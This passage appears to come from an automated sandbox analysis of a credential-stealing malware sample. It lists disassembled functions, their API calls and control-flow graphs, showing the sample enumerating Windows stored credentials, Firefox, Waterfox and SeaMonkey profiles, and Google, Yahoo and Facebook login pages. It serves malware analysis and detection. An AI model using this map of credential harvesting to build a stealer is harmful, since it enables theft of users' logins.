                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                          • API String ID: 2936932814-4196376884
                                                                                                                                                                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                          Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 828 40bdb0-40bdce call 404363 831 40bf63-40bf6f call 40440c 828->831 832 40bdd4-40bddd 828->832 834 40bdee 832->834 835 40bddf-40bdec CredEnumerateW 832->835 836 40bdf0-40bdf2 834->836 835->836 836->831 838 40bdf8-40be18 call 40b2cc wcslen 836->838 841 40bf5d 838->841 842 40be1e-40be20 838->842 841->831 842->841 843 40be26-40be42 wcsncmp 842->843 844 40be48-40be77 call 40bd5d call 404423 843->844 845 40bf4e-40bf57 843->845 844->845 850 40be7d-40bea3 memset 844->850 845->841 845->842 851 40bea5 850->851 852 40bea7-40beea memcpy 850->852 851->852 853 40bf11-40bf2d wcschr 852->853 854 40beec-40bf06 call 40b2cc _wcsnicmp 852->854 855 40bf38-40bf48 LocalFree 853->855 856 40bf2f-40bf35 853->856 854->853 859 40bf08-40bf0e 854->859 855->845 856->855 859->853
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                          • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 697348961-0
                                                                                                                                                                                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                          • API String ID: 1829478387-11920434
                                                                                                                                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                          • API String ID: 1829478387-2068335096
                                                                                                                                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                          • API String ID: 1829478387-3369679110
                                                                                                                                                                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                                                                                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                          Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                          • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateErrorFileLastfree
                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                          • API String ID: 981974120-1717621600
                                                                                                                                                                                                          • Opcode ID: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                          • String ID: $0.@
                                                                                                                                                                                                          • API String ID: 2758756878-1896041820
                                                                                                                                                                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                          Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2941347001-0
                                                                                                                                                                                                          • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcscat$wcscpywcslen
                                                                                                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                          • API String ID: 2489821370-1174173950
                                                                                                                                                                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                          Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 669240632-0
                                                                                                                                                                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                          Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
